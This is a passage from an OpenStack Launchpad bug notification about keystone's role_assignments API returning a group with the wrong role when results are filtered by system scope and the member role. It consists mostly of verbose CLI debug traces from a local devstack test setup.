'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} command: role assignment list -> openstackclient.identity.v3.role_assignment.ListRoleAssignment (auth=True) Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'timing': False, 'additional_user_agent': [('osc-lib', '1.13.0')], u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, u'interface': 'public', 'cacert': None, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'disable_vendor_agent': {}} Using auth plugin: password Using parameters {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'} Get auth_ref REQ: curl -g -i -X GET http://10.0.3.122/identity -H "Accept: application/json" -H "User-Agent: openstacksdk/0.34.0 keystoneauth1/3.17.0 python-requests/2.22.0 CPython/2.7.15+" Starting new HTTP connection (1): 10.0.3.122:80 http://10.0.3.122:80 "GET /identity HTTP/1.1" 300 269 RESP: [300] Connection: close Content-Length: 269 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:29 GMT Location: http://10.0.3.122/identity/v3/ Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-f35dcb91-9d9f-4c85-9421-1600e6a6ec27 RESP BODY: {"versions": {"values": [{"status": "stable", "updated": "2019-07-19T00:00:00Z", "media-types": [{"base": "application/json", "type": "application/vnd.openstack.identity-v3+json"}], "id": "v3.13", "links": [{"href": "http://10.0.3.122/identity/v3/", "rel": "self"}]}]}} GET call to http://10.0.3.122/identity used request id req-f35dcb91-9d9f-4c85-9421-1600e6a6ec27 Making authentication request to http://10.0.3.122/identity/v3/auth/tokens Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "POST /identity/v3/auth/tokens HTTP/1.1" 201 1194 {"token": {"methods": ["password"], "roles": [{"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}], "system": {"all": true}, "expires_at": "2019-10-04T19:56:29.000000Z", "catalog": [{"endpoints": [{"url": "http://10.0.3.122/image", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "279159944f0843179bb376b4a7ac5c45"}], "type": "image", "id": "24305f1e70ec474d895e409f4b339f18", "name": "glance"}, {"endpoints": [{"url": "http://10.0.3.122/identity", "interface": "admin", "region": "RegionOne", "region_id": "RegionOne", "id": "5ba5cca8ad654f5ea9d633321893d620"}, {"url": "http://10.0.3.122/identity", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "f3b136a56d1a4839bd1bc50a070f8f86"}], "type": "identity", "id": "da3d368b566b4a9686ddadbb64004c26", "name": "keystone"}], "user": {"domain": {"id": "default", "name": "Default"}, "password_expires_at": null, "name": "admin", "id": "0ec0eb48c66d4fb79c432a2ff8c5d257"}, "audit_ids": ["JVQCRxBoTUyzm2CqiCoj6w"], "issued_at": "2019-10-04T18:56:29.000000Z"}} run(Namespace(authproject=False, authuser=False, columns=[], domain=None, effective=False, fit_width=False, formatter='table', group=None, group_domain=None, inherited=False, max_width=0, names=True, noindent=False, print_empty=False, project=None, project_domain=None, quote_mode='nonnumeric', role=None, role_domain=None, sort_columns=[], system=u'all', user=None, user_domain=None)) Instantiating identity client: Making authentication request to http://10.0.3.122/identity/v3/auth/tokens Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "POST /identity/v3/auth/tokens HTTP/1.1" 201 1194 {"token": {"methods": ["password"], "roles": [{"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}], "system": {"all": true}, "expires_at": "2019-10-04T19:56:29.000000Z", "catalog": [{"endpoints": [{"url": "http://10.0.3.122/image", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "279159944f0843179bb376b4a7ac5c45"}], "type": "image", "id": "24305f1e70ec474d895e409f4b339f18", "name": "glance"}, {"endpoints": [{"url": "http://10.0.3.122/identity", "interface": "admin", "region": "RegionOne", "region_id": "RegionOne", "id": "5ba5cca8ad654f5ea9d633321893d620"}, {"url": "http://10.0.3.122/identity", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "f3b136a56d1a4839bd1bc50a070f8f86"}], "type": "identity", "id": "da3d368b566b4a9686ddadbb64004c26", "name": "keystone"}], "user": {"domain": {"id": "default", "name": "Default"}, "password_expires_at": null, "name": "admin", "id": "0ec0eb48c66d4fb79c432a2ff8c5d257"}, "audit_ids": ["U9Z3md9YTP-9-bTLuPDIzg"], "issued_at": "2019-10-04T18:56:29.000000Z"}} REQ: curl -g -i -X GET http://10.0.3.122/identity/v3/role_assignments?scope.system=all&include_names=True -H "Accept: application/json" -H "User-Agent: python-keystoneclient" -H "X-Auth-Token: {SHA256}042443671367aa0183e15fd2692bf4c70d15050bdac46db883fd836440ae1065" Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "GET /identity/v3/role_assignments?scope.system=all&include_names=True HTTP/1.1" 200 2401 RESP: [200] Connection: close Content-Length: 2401 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:29 GMT Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-c9bf133b-7ec4-49a5-b9da-3185dc6c55d2 RESP BODY: {"role_assignments": [{"scope": {"system": {"all": true}}, "role": {"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, "group": {"domain": {"id": "default", "name": "Default"}, "id": "c814cd4739bd4960ad08ade3814f1560", "name": "system-admins"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/groups/c814cd4739bd4960ad08ade3814f1560/roles/7a11d0ba747046d7936fbb8f97dc5cb1"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}, "group": {"domain": {"id": "default", "name": "Default"}, "id": "dd97034049fd46a6bdb33a32f1c7759e", "name": "system-auditors"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/groups/dd97034049fd46a6bdb33a32f1c7759e/roles/7ee093f4ccf345bba963ce765f9b797f"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "0ec0eb48c66d4fb79c432a2ff8c5d257", "name": "admin"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/0ec0eb48c66d4fb79c432a2ff8c5d257/roles/7a11d0ba747046d7936fbb8f97dc5cb1"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "0f75914e63cb46e795cae7e6facd0ecb", "name": "operator"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/0f75914e63cb46e795cae7e6facd0ecb/roles/7a11d0ba747046d7936fbb8f97dc5cb1"}}, {"scope": {"system": {"all": true}}, "role": {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "66256692b6b942a8814ffd87d32a3963", "name": "system-support"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/66256692b6b942a8814ffd87d32a3963/roles/a8cd98f2e98d4135b2fa83950d6171ec"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "e8fec49e15984aedb5e1235f279434fe", "name": "auditor"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/e8fec49e15984aedb5e1235f279434fe/roles/7ee093f4ccf345bba963ce765f9b797f"}}], "links": {"self": "http://10.0.3.122/identity/v3/role_assignments?scope.system=all&include_names=True", "previous": null, "next": null}} GET call to identity for http://10.0.3.122/identity/v3/role_assignments?scope.system=all&include_names=True used request id req-c9bf133b-7ec4-49a5-b9da-3185dc6c55d2 +--------+------------------------+-------------------------+---------+--------+--------+-----------+ | Role | User | Group | Project | Domain | System | Inherited | +--------+------------------------+-------------------------+---------+--------+--------+-----------+ | admin | | system-admins at Default | | | all | False | | reader | | system-auditors at Default | | | all | False | | admin | admin at Default | | | | all | False | | admin | operator at Default | | | | all | False | | member | system-support at Default | | | | all | False | | reader | auditor at Default | | | | all | False | +--------+------------------------+-------------------------+---------+--------+--------+-----------+ clean_up ListRoleAssignment: END return value: 0 The Trace above lists all system role assignments to confirm my setup locally. The following trace shows that the group is returned with the wrong role assignment based on the filter. $ openstack role assignment list --names --system all --role member --debug [1/880] START with options: role assignment list --names --system all --role member --debug options: Namespace(access_key='', access_secret='***', access_token='***', access_token_endpoint='', access_token_type='', application_credential_id='', application_credential_name='', application_credential_secret='***', auth_methods='',  auth_type='', auth_url='', cacert=None, cert='', client_id='', client_secret='***', cloud='devstack-system-admin', code='', consumer_key='', consumer_secret='***', debug=True, default_domain='default', default_domain_id='', default_domai n_name='', deferred_help=False, discovery_endpoint='', domain_id='', domain_name='', endpoint='', identity_provider='', identity_provider_url='', insecure=None, interface='public', key='', log_file=None, openid_scope='', os_beta_command=F alse, os_compute_api_version='', os_identity_api_version='', os_image_api_version='', os_key_manager_api_version='1', os_network_api_version='', os_object_api_version='', os_project_id=None, os_project_name=None, os_volume_api_version='',  passcode='', password='***', profile='', project_domain_id='', project_domain_name='', project_id='', project_name='', protocol='', redirect_uri='', region_name='', remote_project_domain_id='', remote_project_domain_name='', remote_proje ct_id='', remote_project_name='', service_provider='', service_provider_endpoint='', service_provider_entity_id='', system_scope='', timing=False, token='***', trust_id='', url='', user_domain_id='', user_domain_name='', user_id='', usern ame='', verbose_level=3, verify=None) Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-ad min', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system _scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key ': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} defaults: {u'auth_type': 'password', u'status': u'active', u'image_status_code_retries': 5, u'baremetal_introspection_status_code_retries': 5, 'api_timeout': None, 'cacert': None, u'image_api_use_tasks': False, u'floating_ip_source': u'ne utron', 'key': None, u'interface': u'public', u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', u'baremetal_status_code_retries': 5, 'verify': True, 'cert': None, u'secgroup_source': u'neutron', u'object_store_api_ version': u'1', u'disable_vendor_agent': {}} cloud cfg: {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 've rify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interfa ce': 'public', u'disable_vendor_agent': {}} compute API version 2.1, cmd group openstack.compute.v2 network API version 2, cmd group openstack.network.v2 image API version 2, cmd group openstack.image.v2 volume API version 3, cmd group openstack.volume.v3 identity API version 3, cmd group openstack.identity.v3 object_store API version 1, cmd group openstack.object_store.v1 key_manager API version 1, cmd group openstack.key_manager.v1 Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-ad min', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system _scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key ': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-ad min', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system _scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key ': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} command: role assignment list -> openstackclient.identity.v3.role_assignment.ListRoleAssignment (auth=True) Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'timing': False, 'additional_user_agent': [('osc-lib', '1.13.0')], u'network_api_version': u'2', u'message': u'', u'image_format': u'q cow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_ti meout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tas ks': False, u'floating_ip_source': u'neutron', 'key': None, u'interface': 'public', 'cacert': None, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_h elp': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'disable_vendor_agent': {}} Using auth plugin: password Using parameters {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'} Get auth_ref REQ: curl -g -i -X GET http://10.0.3.122/identity -H "Accept: application/json" -H "User-Agent: openstacksdk/0.34.0 keystoneauth1/3.17.0 python-requests/2.22.0 CPython/2.7.15+" Starting new HTTP connection (1): 10.0.3.122:80 http://10.0.3.122:80 "GET /identity HTTP/1.1" 300 269 RESP: [300] Connection: close Content-Length: 269 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:49 GMT Location: http://10.0.3.122/identity/v3/ Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-d5 784d4c-7b47-4647-b912-65e6a78b835e RESP BODY: {"versions": {"values": [{"status": "stable", "updated": "2019-07-19T00:00:00Z", "media-types": [{"base": "application/json", "type": "application/vnd.openstack.identity-v3+json"}], "id": "v3.13", "links": [{"href": "http://10. 0.3.122/identity/v3/", "rel": "self"}]}]}} GET call to http://10.0.3.122/identity used request id req-d5784d4c-7b47-4647-b912-65e6a78b835e Making authentication request to http://10.0.3.122/identity/v3/auth/tokens Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "POST /identity/v3/auth/tokens HTTP/1.1" 201 1194 {"token": {"methods": ["password"], "roles": [{"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}], "syste m": {"all": true}, "expires_at": "2019-10-04T19:56:49.000000Z", "catalog": [{"endpoints": [{"url": "http://10.0.3.122/image", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "279159944f0843179bb376b4a7ac5c45" }], "type": "image", "id": "24305f1e70ec474d895e409f4b339f18", "name": "glance"}, {"endpoints": [{"url": "http://10.0.3.122/identity", "interface": "admin", "region": "RegionOne", "region_id": "RegionOne", "id": "5ba5cca8ad654f5ea9d633321 893d620"}, {"url": "http://10.0.3.122/identity", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "f3b136a56d1a4839bd1bc50a070f8f86"}], "type": "identity", "id": "da3d368b566b4a9686ddadbb64004c26", "name": "ke ystone"}], "user": {"domain": {"id": "default", "name": "Default"}, "password_expires_at": null, "name": "admin", "id": "0ec0eb48c66d4fb79c432a2ff8c5d257"}, "audit_ids": ["SGRaWT8BTVuzELGwxqjBdg"], "issued_at": "2019-10-04T18:56:49.000000 Z"}} run(Namespace(authproject=False, authuser=False, columns=[], domain=None, effective=False, fit_width=False, formatter='table', group=None, group_domain=None, inherited=False, max_width=0, names=True, noindent=False, print_empty=False, pro ject=None, project_domain=None, quote_mode='nonnumeric', role=u'member', role_domain=None, sort_columns=[], system=u'all', user=None, user_domain=None)) Instantiating identity client: Making authentication request to http://10.0.3.122/identity/v3/auth/tokens Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "POST /identity/v3/auth/tokens HTTP/1.1" 201 1194 {"token": {"methods": ["password"], "roles": [{"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}], "syste m": {"all": true}, "expires_at": "2019-10-04T19:56:50.000000Z", "catalog": [{"endpoints": [{"url": "http://10.0.3.122/image", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "279159944f0843179bb376b4a7ac5c45" }], "type": "image", "id": "24305f1e70ec474d895e409f4b339f18", "name": "glance"}, {"endpoints": [{"url": "http://10.0.3.122/identity", "interface": "admin", "region": "RegionOne", "region_id": "RegionOne", "id": "5ba5cca8ad654f5ea9d633321 893d620"}, {"url": "http://10.0.3.122/identity", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "f3b136a56d1a4839bd1bc50a070f8f86"}], "type": "identity", "id": "da3d368b566b4a9686ddadbb64004c26", "name": "ke ystone"}], "user": {"domain": {"id": "default", "name": "Default"}, "password_expires_at": null, "name": "admin", "id": "0ec0eb48c66d4fb79c432a2ff8c5d257"}, "audit_ids": ["2nu0u-1wQRmWA9_uS2hZ-g"], "issued_at": "2019-10-04T18:56:50.000000 Z"}} REQ: curl -g -i -X GET http://10.0.3.122/identity/v3/roles/member -H "Accept: application/json" -H "User-Agent: python-keystoneclient" -H "X-Auth-Token: {SHA256}cb5bcba8735c5a7ea6f80ea414ee306e1a0b6a9c0c39c4dbf1296a96f6516ab6" Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "GET /identity/v3/roles/member HTTP/1.1" 404 84 RESP: [404] Connection: close Content-Length: 84 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:50 GMT Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-88bce424-60f2-4d2a-a6f5-2bd256602789 RESP BODY: {"error":{"code":404,"message":"Could not find role: member.","title":"Not Found"}} GET call to identity for http://10.0.3.122/identity/v3/roles/member used request id req-88bce424-60f2-4d2a-a6f5-2bd256602789 Request returned failure status: 404 REQ: curl -g -i -X GET http://10.0.3.122/identity/v3/roles?name=member -H "Accept: application/json" -H "User-Agent: python-keystoneclient" -H "X-Auth-Token: {SHA256}cb5bcba8735c5a7ea6f80ea414ee306e1a0b6a9c0c39c4dbf1296a96f6516ab6" Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "GET /identity/v3/roles?name=member HTTP/1.1" 200 322 RESP: [200] Connection: close Content-Length: 322 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:50 GMT Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-ce429b68-b53d-4c49-9080-ed3da3bce55b RESP BODY: {"links": {"self": "http://10.0.3.122/identity/v3/roles?name=member", "previous": null, "next": null}, "roles": [{"description": null, "links": {"self": "http://10.0.3.122/identity/v3/roles/a8cd98f2e98d4135b2fa83950d6171ec"}, " options": {}, "id": "a8cd98f2e98d4135b2fa83950d6171ec", "domain_id": null, "name": "member"}]} GET call to identity for http://10.0.3.122/identity/v3/roles?name=member used request id req-ce429b68-b53d-4c49-9080-ed3da3bce55b REQ: curl -g -i -X GET http://10.0.3.122/identity/v3/role_assignments?scope.system=all&role.id=a8cd98f2e98d4135b2fa83950d6171ec&include_names=True -H "Accept: application/json" -H "User-Agent: python-keystoneclient" -H "X-Auth-Token: {SHA 256}cb5bcba8735c5a7ea6f80ea414ee306e1a0b6a9c0c39c4dbf1296a96f6516ab6" Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "GET /identity/v3/role_assignments?scope.system=all&role.id=a8cd98f2e98d4135b2fa83950d6171ec&include_names=True HTTP/1.1" 200 1328 RESP: [200] Connection: close Content-Length: 1328 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:50 GMT Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-08f9bdb9-149d-4905-96cc-99b87c8b6339 RESP BODY: {"role_assignments": [{"scope": {"system": {"all": true}}, "role": {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}, "group": {"domain": {"id": "default", "name": "Default"}, "id": "dd97034049fd46a6bdb33a32f1c7759e" , "name": "system-auditors"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/groups/dd97034049fd46a6bdb33a32f1c7759e/roles/7ee093f4ccf345bba963ce765f9b797f"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7a11d0ba74 7046d7936fbb8f97dc5cb1", "name": "admin"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "0f75914e63cb46e795cae7e6facd0ecb", "name": "operator"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/0f75914 e63cb46e795cae7e6facd0ecb/roles/7a11d0ba747046d7936fbb8f97dc5cb1"}}, {"scope": {"system": {"all": true}}, "role": {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, "user": {"domain": {"id": "default", "name": "Default"}, "id":  "66256692b6b942a8814ffd87d32a3963", "name": "system-support"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/66256692b6b942a8814ffd87d32a3963/roles/a8cd98f2e98d4135b2fa83950d6171ec"}}], "links": {"self": "http://10. 0.3.122/identity/v3/role_assignments?scope.system=all&role.id=a8cd98f2e98d4135b2fa83950d6171ec&include_names=True", "previous": null, "next": null}} GET call to identity for http://10.0.3.122/identity/v3/role_assignments?scope.system=all&role.id=a8cd98f2e98d4135b2fa83950d6171ec&include_names=True used request id req-08f9bdb9-149d-4905-96cc-99b87c8b6339 +--------+------------------------+-------------------------+---------+--------+--------+-----------+ | Role | User | Group | Project | Domain | System | Inherited | +--------+------------------------+-------------------------+---------+--------+--------+-----------+ | reader | | system-auditors at Default | | | all | False | | admin | operator at Default | | | | all | False | | member | system-support at Default | | | | all | False | +--------+------------------------+-------------------------+---------+--------+--------+-----------+ clean_up ListRoleAssignment: END return value: 0 ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1846817 Title: v3/role_assignments filtering exposes unnecessary role assignments Status in OpenStack Identity (keystone): New Status in OpenStack Security Advisory: Won't Fix Bug description: I have a deployment that exercises multiple system role assignments:  - An "operator" user has the "admin" role on the system  - A "system-support" user has the "member" role on the system  - A "system-admins" group has the "reader" role on the system If I ask keystone to filter a list of role assignments by --system all and --role member, I should only see a list with the "system-support" user and the "operator" user. Instead, I get a list with three entries that includes the group, which doesn't have the member role at all, it only has reader. Depending on how you classify this, it could leak information to clients. Groups don't appear to be filtered from the list since "reader" doesn't imply "member" (it's the other way around). $ openstack role assignment list --names --system all --debug START with options: role assignment list --names --system all --debug options: Namespace(access_key='', access_secret='***', access_token='***', access_token_endpoint='', access_token_type='', application_credential_id='', application_credential_name='', application_credential_secret='***', auth_methods='', auth_type='', auth_url='', cacert=None, cert='', client_id='', client_secret='***', cloud='devstack-system-admin', code='', consumer_key='', consumer_secret='***', debug=True, default_domain='default', default_domain_id='', default_domain_name='', deferred_help=False, discovery_endpoint='', domain_id='', domain_name='', endpoint='', identity_provider='', identity_provider_url='', insecure=None, interface='public', key='', log_file=None, openid_scope='', os_beta_command=False, os_compute_api_version='', os_identity_api_version='', os_image_api_version='', os_key_manager_api_version='1', os_network_api_version='', os_object_api_version='', os_project_id=None, os_project_name=None, os_volume_api_version='', passcode='', password='***', profile='', project_domain_id='', project_domain_name='', project_id='', project_name='', protocol='', redirect_uri='', region_name='', remote_project_domain_id='', remote_project_domain_name='', remote_project_id='', remote_project_name='', service_provider='', service_provider_endpoint='', service_provider_entity_id='', system_scope='', timing=False, token='***', trust_id='', url='', user_domain_id='', user_domain_name='', user_id='', username='', verbose_level=3, verify=None) Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} defaults: {u'auth_type': 'password', u'status': u'active', u'image_status_code_retries': 5, u'baremetal_introspection_status_code_retries': 5, 'api_timeout': None, 'cacert': None, u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, u'interface': u'public', u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', u'baremetal_status_code_retries': 5, 'verify': True, 'cert': None, u'secgroup_source': u'neutron', u'object_store_api_version': u'1', u'disable_vendor_agent': {}} cloud cfg: {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} compute API version 2.1, cmd group openstack.compute.v2 network API version 2, cmd group openstack.network.v2 image API version 2, cmd group openstack.image.v2 volume API version 3, cmd group openstack.volume.v3 identity API version 3, cmd group openstack.identity.v3 object_store API version 1, cmd group openstack.object_store.v1 key_manager API version 1, cmd group openstack.key_manager.v1 Auth 